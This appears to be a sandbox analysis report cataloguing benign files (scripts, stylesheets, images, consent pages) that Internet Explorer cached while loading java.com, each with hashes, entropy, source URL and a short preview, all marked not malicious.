Preview:	!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t():"function"==typeof define&&define.amd?define(t):t()}(0,function(){"use strict";function e(e){var t=this.constructor;return this.then(function(n){return t.resolve(e()).then(function(){return n})},function(n){return t.resolve(e()).then(function(){return t.reject(n)})})}function t(e){return new this(function(t,n){function o(e,n){if(n&&("object"==typeof n\|\|"function"==typeof n)){var f=n.then;if("function"==typeof f)return void f.call(n,function(t){o(e,t)},function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)})}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}if(!e\|\|"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);for(var i=r.length,f=0;r.length>f;f++)o(f,r[f])})}function n(e){return!(!e\|\|"undefined"==typeof e.length)}function o(){}function r(e){if(!(this instanceof r))

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\render[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	5443
Entropy (8bit):	4.986757619365243
Encrypted:	false
SSDEEP:	96:42wPg4jiZqTxEE2jSBOyOLpoVuM9gXlyVTakH:4VPgCiZWR2eBOyepoVuM9SAaW
MD5:	1AB11CB35BFDFB48448EA5594C3BC5AE
SHA1:	A6D9DE08907DEA946248751637E7592AF59DA9CF
SHA-256:	B719089A5754F4FEC74C1A01E8AD645CBC8841C00FF1362FF31EDEC9EE7D4C1A
SHA-512:	7DA26591CC62F8886F8AB76AB134594ED6899553D8C54FC2713FEB9199716026BE1FE9B75B50843505A6B3677A30852A66874ED456EB60E94A1039C1B629A523
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_2094/_compdelivery/JCOM-Header/assets/render.js
Preview:	/* globals define */.define(['knockout', 'jquery', 'text!./template.html', 'i18n!nls/header'], function(ko, $, sampleComponentTemplate, head) {.'use strict';.var ComponentViewModel = function (args) {....// Boilerplate to help us store....var self = this,.....SitesSDK = args.SitesSDK;.....// Store the args. Some times we need these for various functions.....// For example the viewMode will tell you whether you are in edit or edit mode....self.mode = args.viewMode;....self.id = args.id;.....// Define the observables that we are binding....self.showLogo = ko.observable(false);....self.showNav = ko.observable(false);....self.showSearch = ko.observable(false);....self.navLinks = ko.observableArray([]);....self.srchDefault = head.Search;.....// Define any computed functions, which are essentially read only observables.....// This computed function returns the url of the image we were passed......self.resetNav = function() {.....self.renderNav();....};.....self.renderNav = function() {.....s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\render[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	exported SGML document, UTF-8 Unicode text
Category:	downloaded
Size (bytes):	9798
Entropy (8bit):	4.822811148672577
Encrypted:	false
SSDEEP:	192:TN4cGGvCMLnJUp5faTF7TkSbGibbc1F0MUJhE24o5sRXqMzXpsvo9LM9dqIC:TNuC+gJTmB8J4mvE5
MD5:	CDA175F1776F94D8025CF4B6578D5EDB
SHA1:	A9E38E986A90632E63007E6F77DB0CD055F64442
SHA-256:	610CEE97B15F5669A733F0802726988EA641C103C10AFAAA7353D2C6C3878840
SHA-512:	A9B691A6D6708C83D5A27783F8C8BD6223056DB2149DC25FAA2137B52FE45C075099D33EDA5A18BB0B6AAF80E515CDD156E3929FF8A6A2BF50D4B9072609255E
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_2094/JCOM-SimplePage_Detail/assets/render.js
Preview:	/*. Copyright (c) 2019 Oracle and/or its affiliates. All rights reserved.. * Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl.. /./ globals define,console */.define([.."jquery",.."mustache",.."marked",.."text!./layout.html".], function ($, Mustache, Marked, templateHtml) {.."use strict";...// Content Layout constructor function...function ContentLayout(params) {...this.contentItemData = params.contentItemData \|\| {};...this.scsData = params.scsData;...this.contentClient = params.contentClient;..}...// Helper function to format a date field by locale...function dateToMDY(date) {...if (!date) {....return "";...}....var dateObj = new Date(date);....var options = {....year: "numeric",....month: "long",....day: "numeric",....hour: "2-digit",....minute: "2-digit"...};...var formattedDate = dateObj.toLocaleDateString("en-US", options);....return formattedDate;..}...// Helper function to parse markdown text...function parseMarkdown(mdText

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	143674
Entropy (8bit):	5.662246051762384
Encrypted:	false
SSDEEP:	3072:MMH1ozeBNX2WU4PTUMMgy14K7ogRqhwiwRJDE9H:B1ozeBNX214L9xulRJDQH
MD5:	EA3D9DEE0B9B737078D1EB9F46713421
SHA1:	DF7F48656D226F77A826712F3533D52D1423C06F
SHA-256:	807ACD2AD6A0DA69A1EEA36DB0C1E36744F3EB3D279291001B403FE58C7854A2
SHA-512:	04F7C62525E708081A8AF31A950BE4A0466F3B229FDB15952DA30AE39EC4E9E302C018D281575AF14511CBC56EC828836C3270860F133E84A1AEAA78FFB7EE1B
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/0D070042D9C67A68E1A4BF804E6E0E06.cache.html
Preview:	<!doctype html>.<html><head><meta charset="UTF-8" /><script>var $gwt_version = "2.5.1";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '0D070042D9C67A68E1A4BF804E6E0E06';function __gwtStartLoadingFragment(frag) { return $moduleBase + 'deferredjs/' + $strongName + '/' + frag + '.cache.js';};function __gwtInstallCode(code) {var head = document.getElementsByTagName('head').item(0);var script = document.createElement('script');script.type = 'text/javascript';script.text = code;head.appendChild(script);};var $stats = $wnd.__gwtStatsEvent ? function(a) {return $wnd.__gwtStatsEvent(a);} : null,$sessionId = $wnd.__gwtStatsSessionId ? $wnd.__gwtStatsSessionId : null;$stats && $stats({moduleName:'defaultpreferencemanager',sessionId:$sessionId,subSystem:'startup',evtGroup:'moduleStartup',millis:(new Date()).getTime(),type:'moduleEvalStart'});</script></head><body><script> .function Pj(){}.function P_(){}.function nk(){}.function $q(){}.function zt(){

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\JavaAlice[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	3811
Entropy (8bit):	7.850192369179497
Encrypted:	false
SSDEEP:	96:YaKeVfWUtV7GNVz9Bu8Qydxh6zzvupXg8B:LfWUniNV5h6zzvYXg8B
MD5:	F26405E1D9347863352B5E7CEA270155
SHA1:	192894C813979D6ADB08BD2BECE0D0A5DEBFE96A
SHA-256:	70145461B9DD7661B2FDE95B572262B9A4AC4044FF9C4D99450A5B1CEC93A1CA
SHA-512:	94F753BA1F9E6512700DDAA6CD8559109C31B55C2A4B546A5708F75D5CADC175AF1CB438498FE62E94192EFC45B1F88097F4A27CC74340BCCD3EBF45FA12C6CC
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT9D14685A7F0F4C7782D8B91D06E60E37/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................E..........................!....1Aq"3QRUVa.....246su...#$r...B.S...................................0.......................1..!A.Qa."q..#.......B.............?..J.:e..x...%.[m...8..NV.r.u.^O;.......o...N.'......i..y.u.c\|..Y....y.u.c\|.ry.p]}X.&.....w.._V7.'......i.....y.u.c\|.ry.p]}X.&.....w.._V7.'......i.....y.u.c\|.ry.p]}X.&...1....$w..";.(}-.-.h.....t.'hdU..'j....?n.o...[.T...........8..Gf..)>.j..zOed.:!.\..r.......;..qLT...........8..v_...f.....VOs....O./?.~....c.D.P.H.R..i..$a..m.+s.x..#......$o..Uu't..Bc...z.....<\|.!;.:#<=OySe..e.R......N.k.h..f..$#.<.........u.A.e.E......\.Q...#.....88.."..........R}........tCb.i!2.JQ.E..O@.....oN^e.Q?.DEl....dxMz~..I.>...\R...s.!.\)K.c.... k...&M...q....N.^pn%j..ki.';..[4.Q........^....n.b[.t\..7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Oracleacademy(2)[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	4900
Entropy (8bit):	7.90049937566647
Encrypted:	false
SSDEEP:	96:XLElCYEO3u1fQ8i0id8UIu3HOwqi/PxbCvGTGK9Q5Sr0gwFC7ofJK:X4lCYEYu148fyuwr0v8ZGpFSofJK
MD5:	CFE0F1B70C44984498BCBB32E3913E28
SHA1:	4C71674AB77C183746263886A86051DD6DC7C3DB
SHA-256:	3A09A1B1EA0D785CA29174C25AF6F42656831898E9B09FC0B2AFB25A5E82A068
SHA-512:	58B02CF5537D7776468D010992589A57B64DA47ABEF45FD92F83A3423366E5C94D48903216A10A6401634FD7C0E2047D8DE4A014BD258414250675E6E252C56B
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT862DE06B4B724C38B1F5D3FA3EB08BFB/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!.........................................X...........................!1...."AQaq...#25BSUt.....$RTbrs.......%3C......467Dcu.....................................3.........................!.1Q.A..."BSTq.......a..............?..v..<....1.R]e......1.I+a.K.1.5.......X.S..M,.x.u..:=4.....7....K;.;..c}N.M,.x.u..:........X.S..K;.;..c}N.=4.....7....N....X.S.$....w.%.[:v.k...\d..g..u0\..O.y..."5...k9...Q...Q...p;..q@qj.j.V.s...c............%>^.@w...k.n.b..[..u..1..j.)&.A.%..."V..nO.&+%.1...i.....4.0....ZY.*?f.v....4..4.E.Q@.P..WN_5M.N...Ls.m'..Q<... U...cm....:......`....{...(G.....%K..Z..t...)..iI.$...O....\..vk.=.e.s.....8...z..@.i....$..+.,..@........'....B.6.A.6.4.HD.....a.s.A..hQ.e.=..U3`.pfz..2Tw.IASJDD..J....9q..r......7[f..7gK...1...o....%......+a.-9.d'.Z.^g^."T..;[...y..9..N?

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cookie_inneriframe[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	2008
Entropy (8bit):	5.157980344637123
Encrypted:	false
SSDEEP:	48:R+AWZDXeNYhGtcO4S63v0SaATPsLXQa+/NT:GbcciSaATkLgV
MD5:	D09BEB4594BA45F809C9DB7E4429551B
SHA1:	6E2D0D8C237175DB1509E707B7166042D65C694B
SHA-256:	A2DE091C86C5A7B6DCC572EB6E5A76C2CD72CE27A2042A8DC2974F15B33566ED
SHA-512:	2D5373C167742FFB7654D528BE59029BB930221588A49B27FD3AF17EB9457EC6E41D76F1C040BF21E35A8E94B372AE5F87E95B91C4EB5F70CFFF584B314DCFF0
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/cookie_inneriframe.html
Preview:	<html>.<body>.<script type="text/javascript">. function getSameSiteValue(){. var isHttps = ((self.location.protocol == "https:") ? " Secure;" : ""); //conditionally adds Secure tag only if parent frame is HTTPS. var sameSiteValue = isHttps ? "None;" : "Lax;";. var cookieAttrb = (" SameSite=" + sameSiteValue) + isHttps;. return cookieAttrb;. }...function sameSiteCompatible(userAgent){...return !hasWebKitSameSiteBug(userAgent);..}...function hasWebKitSameSiteBug(userAgent){...return isIosVersion(12, userAgent) \|\| (checkMacOSVersion(userAgent) && checkIfSafariBrowser(userAgent)) \|\| checkChromeVersion(userAgent);..}...function isIosVersion(major, userAgent){...var retVal = true;....var start = userAgent.indexOf('OS');...if( ( userAgent.indexOf('iPhone') > -1 \|\| userAgent.indexOf('iPad') > -1 ) && start > -1 ){....var iosVersion = window.Number( userAgent.substr( start + 3, 3 ).replace( '_', '.'));.....if(iosVersion > major){.....retVal = false;....}...}els

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\en[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	7868
Entropy (8bit):	5.955885351258973
Encrypted:	false
SSDEEP:	192:EwvXRwOI5C0n1YxSLZ99wjLUQLaBuutK/CvVlYV25q:EwvXRwXC0n1YcL9we4oVl0h
MD5:	AED4E8184B939A91840607F42ED6AA18
SHA1:	67B3DB17A0A7775C8CDFD8F144D51B758126437C
SHA-256:	ECF9F6002066EFA72B94CEC9970F3F2E0658C88BD53FE88ACFADDCE46A35354E
SHA-512:	30CD6C20357DBBEA4ADDCB98BDF81684101133AD5F3C827D94C2D4E0485577744ED6D10D73618E402D0D1E30CA2CE3920DBD830A0973D7094E1F44E01A05D2CF
Malicious:	false
IE Cache URL:	https://www.java.com/en/
Preview:	<!DOCTYPE html>.<html>.<head>.<script type="text/javascript">.var SCSCacheKeys = {..product: '_cache_24c8',..site: '_cache_d099',..theme: '_cache_4ba9',..component: '_cache_2094',..caas: '_cache_97bc'.};.</script>.<meta http-equiv="X-UA-Compatible" content="IE=edge">.<meta name="viewport" content="initial-scale=1">.<script type="text/javascript">.var SCS = { sitesCloudCDN: 'https://static.oracle.com/cdn/cec/v21.2.1.30',.sitePrefix: '/site/JCOM/' };.</script>.<script src="https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js"></script>.. <script>(window.BOOMR_mq=window.BOOMR_mq\|\|[]).push(["addVar",{"rua.upush":"false","rua.cpush":"false","rua.upre":"true","rua.cpre":"false","rua.uprl":"false","rua.cprl":"false","rua.cprf":"false","rua.trans":"SJ-1acddf3f-8db4-4a02-b4dc-17912945ae6d","rua.cook":"true","rua.ims":"false","rua.ufprl":"false","rua.cfprl":"false","rua.isuxp":"","rua.texp":""}]);</script>. <script>!function(e){var n="

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\footer.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	852
Entropy (8bit):	5.239961892663503
Encrypted:	false
SSDEEP:	24:xzptfQ2g9jDQkPBNIjA6hi2A6VOP8ce4+JlN8hDc+:xfQZZvIXU2Lseoc+
MD5:	B75CF6F8E60B4B337B0E80BD2F7B532F
SHA1:	02E01563455F45A096D55DEEA946073CA0475D50
SHA-256:	ACA721CB0D61F54B47CEDA57C90777FA82ADBF68F494B5AA9F3F3D92D6AAC102
SHA-512:	82299CF911C787BF3DF36E3C9ECC94E47A4D78183B5B3DDEFFED00673D356875F0736D7EECEA6F5626ADFC0B6B31E687D6354B044ECDDB6E27E67371BFAD34BF
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT32E28F7C5A8446DDA7E9CFA66A3A6DB7/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	var popupReference=null;function popFeedback(c){null==popupReference\|\|popupReference.closed?(navigator.userAgent.match(/(IE\|Internet Explorer\|Trident)/)&&(c=updateQueryParam("p",location.pathname,c)),params="width=620,height=635,directories=0,location=0,menubar=0,resizable=0,scrollbars=1,status=0,toolbar=0",popupReference=window.open(c,"popup",params)):popupReference.focus();return!1}.function updateQueryParam(c,d,a){var e=RegExp("([?&])"+c+"=.?(&\|$\|#)(.)","gi"),b;if(e.test(a)){if("undefined"!==typeof d&&null!==d)return a.replace(e,"$1"+c+"="+d+"$2$3");b=a.split("#");a=b[0].replace(e,"$1$3").replace(/(&\|\?)$/,"");if("undefined"!==typeof b[1]&&null!==b[1])return a+="#"+b[1]}else if("undefined"!==typeof d&&null!==d)return e=-1!==a.indexOf("?")?"&":"?",b=a.split("#"),a=b[0]+e+c+"="+d,"undefined"!==typeof b[1]&&null!==b[1]&&(a+="#"+b[1]),a};.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\infinity_common[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	13562
Entropy (8bit):	5.416978515318094
Encrypted:	false
SSDEEP:	384:T2y6zJxt9uvRndnHEbsW0x+B8ccB+3qw2ERhfZR:TbJVK16w2UxZR
MD5:	A9032E68F2D9591E126404046A2BC7AB
SHA1:	B504627E622CCB9DFA1B6A828EA2BC2B37E80825
SHA-256:	B93E3D28B7AA290C8DB2BB4E1CA75D9BD1D84E85AA867BCFA598A6B2A3D27562
SHA-512:	08407843545CB9709CCA1DEEA3D95A68CAF73BC281A5F006F4499C86C7BD742EFD475533F1B9652A2F53B17F07352D5AF437FA2D085E8619CF33C2632E5D4220
Malicious:	false
IE Cache URL:	https://www.oracle.com/asset/web/analytics/infinity_common.js
Preview:	/!.######################################################..# INFINITY_COMMON.JS..# Version: 1.16.# BUILD DATE: Friday, Feb 19, 2021..# COPYRIGHT ORACLE CORP 2021 [UNLESS STATED OTHERWISE]..######################################################./.var OraInfCustPluginGlobals=(function(){var publicScope={};publicScope.getUrlQueryParameter=function(name){name=name.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var regex=new RegExp("[\\?&]"+name+"=([^&#])");var results=regex.exec(location.search);return results===null?"":decodeURIComponent(results[1].replace(/\+/g," "));};publicScope.getHostName=function(r){if(r){var e=r.match(/\/\/(www[0-9]?\.)?(.[^/:]+)/i);return null!=e&&e.length>2&&"string"==typeof e[2]&&e[2].length>0?e[2]:null;}};publicScope.getHostObject=function(r){if(r){var e=r.match(/^(?:https?:\|ftps?:)?(?:\/\/)?([^\/\?]+[.]+[\w]+[:\w])/i);return null!=e&&e.length>1&&"string"==typeof e[1]&&e[1].length>0?{origin:e[0],host:e[1]}:null;}};publicScope.getMetaTagValue=function(name){var

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\java_home_photo2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 320x303, frames 3
Category:	downloaded
Size (bytes):	18684
Entropy (8bit):	7.941482665517741
Encrypted:	false
SSDEEP:	384:MD9jCVd+P1avntf3LFbzluWnanYPayLhhRgBuTAzZ4:Y9jCPOgvtf3LFbhuVIayLRgITkZ4
MD5:	F31AE0A9ACBC9D62A93E4A942C762A2D
SHA1:	1F9AAFA48280BB10EC6E055C95468EC7C7AC1A58
SHA-256:	61177657E9643FE669E02FE1971011EA7E1159D42ECC80F1C0E36BA505AD1416
SHA-512:	3710959B8CADAC9B3B4C0B9D08B7663391404C952124D5FE85E4F1F1DF0E36E5641BBD92481D4F4D8F9CBE3EC46C99FE35048413C007A3F627B2AA2BDB8FDEB0
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/java_home_photo2.jpg
Preview:	......JFIF.....d.d......Ducky.......K.....&Adobe.d.......................0...H............................................................................................................................................./.@.......................................................................................... 1..0@!.P"2.A#..`$B3pC%.......................!1AQ..q"0@a.2B.#. ..R..br.3C..$.P...Scs4....................P`!....................!1A.Qa@q. 0..P..........................F.e]3...-6.3.#1p.Js............:.]9.t....s[\....J...zc....4...............p[1...<6.v../+y..M~....b...........j[.e.3.h:gazzF..;c.K.2...21={-;=..:eP........A.K..8.u.n"m&!..&.c..C;.<...n]..............Zo..s....d...lmH.!.........c.f}.l..........W...e.o.>.._;.Jf&..e=,f..../....\$........[#.SO...t....1..le...X.V.^D.QRi..g}..GL3R...........\;4M.."....s....\|r..R.:..f.\Rz.>.............n\|.O...jS..q.d3./.>..;.1{.L......>..Io..M...........M>z...v.[u?/..p....4.\.W.+l,oK.^...>.[\.........h\|..O .

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\notice[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	8929
Entropy (8bit):	5.410329350680202
Encrypted:	false
SSDEEP:	192:57TGITdVKY0GASJ7MF1fpem4T2J1tvFnj1E6mnNUy3cr:BGS97ASJ3T2JFnj6NUy3cr
MD5:	0FE49EF9F538E6269DB10F9252675236
SHA1:	477E7C7547BB1B41D8ECA0A5874E513BB1939C1A
SHA-256:	3BE11544451643FD5750391DE4723874601F17FA3D12E55EC7408AA8064495FD
SHA-512:	A8EFAE9E134D018C814A81AB92AB5210C798AB26F601812937C1BA4E24AF2F6B90E9DF1F18CA6F4487B95C6D188AFF61DC95D8434B8E0597769377EAFB5337BF
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/notice?domain=oracle.com&c=teconsent&js=bb&noticeType=bb&text=true&gtm=1&language=en
Preview:	function _truste_eumap(){truste=self.truste\|\|{};truste.eu\|\|(truste.eu={});truste.util\|\|(truste.util={});.(new Image(1,1)).src=("https://consent.trustarc.com/log".replace("http:","https:"))+"?domain=oracle.com&country=ch&state=&behavior=expressed&c="+(((1+Math.random())65536)\|0).toString(16).substring(1);.truste.util.error=function(l,h,k){k=k\|\|{};var j=h&&h.toString()\|\|"",e=k.caller\|\|"";if(h&&h.stack){j+="\n"+h.stack.match(/(@\|at)[^\n\r\t]/)[0]+"\n"+h.stack.match(/(@\|at)[^\n\r\t]*$/)[0].}truste.util.trace(l,j,k);if(truste.util.debug\|\|!h&&!l){return}var d={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(d.enableJsLog){delete k.caller;delete k.mod;delete k.domain;delete k.authority;k.msg=l;var i=new (self.XMLHttpRequest\|\|self.XDomainRequest\|\|self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.i.open("POST",d.apigwlambdaUrl,true);i.setRequestHeader&&i.setRequestHeader("Content-type","application/json");.i.send(truste.util.getJSON({info:truste.util.getJSON(k)\|\|"",erro

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\oldcss[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	19531
Entropy (8bit):	5.148684251674867
Encrypted:	false
SSDEEP:	192:PdaRCcLuJDRUuOlg/HPYxbMzZq7F2cqNYJvPb/aG5hDupXOgqt+:0HLuJDiuOlg/HPubMzZwSNg/vi
MD5:	431EA90E739570FDA7F169C183BE4FBE
SHA1:	2F7A22A112452C0C02C77545DCB38D65FFB66F80
SHA-256:	90F255EBB8406F78FEC80E412DB772F50AD451F4989352763BAF69728AF37369
SHA-512:	B35797825EA18F47FD64B70B5DB91D48D625C22380179FC841F5F3E84D0A7D3DFA594FB21776CF147B30ABE704C9AD0A70CBD1E790AFA31586AD5ACD0606536D
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/oldcss.css
Preview:	TD.bodycell{background-color:#fff}.orangelink{color:#333}a.orangelink{text-decoration:underline}a.orangelink:hover{text-decoration:none}.orangebold{color:#3e6b8a;font-weight:bold}a.orangebold{text-decoration:underline}a.orangebold:hover{text-decoration:none}.subtitle{font-family:Verdana,Arial,Helvetica,Sans-serif;color:#1e475b;font-weight:bold}H3.black{color:#000;font-weight:bold;display:inline}html table.helpHeader{border:1px solid #e4e2e2;border-bottom-width:2px}th.helpHeader{padding-top:3px;padding-bottom:3px;padding-left:10px;color:#000;text-transform:uppercase;vertical-align:middle;line-height:23px}html th.helpHeader{background:#f0efef repeat-y !important}html th.helpHeader a:visited,html th.helpHeader a:link{color:black;font-weight:bold;text-decoration:none}ul.newlist li{color:red;padding-left:0}TD.gradientHeader{padding-top:3px;padding-bottom:3px;padding-left:10px;color:#000;text-transform:uppercase;vertical-align:middle;line-height:23px}a.gradientHeader{color:#000;text-decorati

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\renderer[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	846112
Entropy (8bit):	5.706281748309152
Encrypted:	false
SSDEEP:	24576:inRcPNfZgEmYr1IVohAkk2JdLO+Ma6AkcQ:0RcPNfnr1IVohAkk2JdLO+MaV8
MD5:	A8B04F8E85FE22765349A2D75742CF9E
SHA1:	5BF2BCCF3679399A65FFBDBB9775999934306B1B
SHA-256:	1FE9B2D5C9E775575851158C4338865563B099DD43254FF5E4F1872C78BDCADC
SHA-512:	F257AB31C8AAEC33B2A5774C0902732CA6C8AE8D8B74719A3C3FD71B0BA0712749569CCFDA2F16C36BFD5ADDFC79EF1E27F00AF7B8310A95E9EC14BEDC275C3B
Malicious:	false
IE Cache URL:	https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js
Preview:	/** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.3.6 Copyright jQuery Foundation and other contributors.. * Released under MIT license, https://github.com/requirejs/requirejs/blob/master/LICENSE. /.var requirejs,require,define;(function(global,setTimeout){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.3.6",commentRegExp=/\/\[\s\S]?\\/\|([^:"'=]\|^)\/\/.$/gm,cjsRequireRegExp=/[^.]\srequire\s$\s["']([^'"\s]+)["']\s*$/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window\|\|"undefined"==typeof navigator\|\|!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete\|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\s_code_remote[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	3135
Entropy (8bit):	5.343899292674586
Encrypted:	false
SSDEEP:	48:TIx98yes/Y1josQ45kIIJYaygOObTVno4b6GabIufdB:MPTh/Y1E4xISObBrZabddB
MD5:	013C759D9E735927DE9443BA35B4FDDB
SHA1:	2D14300D76E34B41EFDD5A8EA57E4A79859571F4
SHA-256:	BFF04C18BF3D41EA1E9AE7B5C7694782D282907AE8B3BE78B7FED1ACD5D3DB61
SHA-512:	0613D1DAB0F61A085229982D9DEEDB50B30A6481B072912B8C4868E5BB973391615A2612394AA4E2F5214174CA5078ECD9D940DE508B062855D6B48793B921F7
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/s_code_remote.js
Preview:	/!.######################################################..# S_CODE_REMOTE.JS..# Version: 1.00..# BUILD DATE: Tue Jul 17 2018 12:05:01 GMT-0400 (Eastern Daylight Time)..# COPYRIGHT ORACLE CORP 2018 [UNLESS STATED OTHERWISE]..######################################################./.try{oracle.truste.api.getConsentDecision().consentDecision;oracle.truste.api.getConsentDecision().source}catch(err){var oracle=oracle\|\|{};oracle.truste={};oracle.truste.api={};(function(){var trusteStorageItemName="truste.eu.cookie.notice_preferences";this.getCookieName=function(){return"notice_preferences"};this.getStorageItemName=function(){return trusteStorageItemName}}).apply(oracle.truste);(function(){var trusteCommon=oracle.truste;function getCookie(cookieKey){for(var name=cookieKey+"=",cookieArray=document.cookie.split(";"),i=0;i<cookieArray.length;i++){for(var c=cookieArray[i];" "==c.charAt(0);)c=c.substring(1);if(0==c.indexOf(name))return c.substring(name.length,c.length)}return null}function getLo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\setupLibs[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1672
Entropy (8bit):	5.318338031938511
Encrypted:	false
SSDEEP:	24:xaJ0n6WpZCBqmIuHN2jIw30UfImd0/yqUmeyFC1cwKYmRNymRIoTV/2k/VT7G1Rb:EJ0n6WpZCj0VkU0/yqUHgC1bARJOd
MD5:	D0C9B1531E2D775FCFDD46AE7BE117F1
SHA1:	6A2EF6AE293DAA32312FF20677F03820BE192C84
SHA-256:	0090AF7B11B5B2C49CFD848E2A6A6C2F3223AB36A5C093630804A132412D4883
SHA-512:	F7FBEB4E46405194E4675AF16CC0923BBA8A1AFD4E444FB9BBB5A37104E9F0E210E52BB7A07B2D679AE6D6BA7B4038B9E2686E02E02801CB4DF3C19B9C6B9F22
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/setupLibs.js
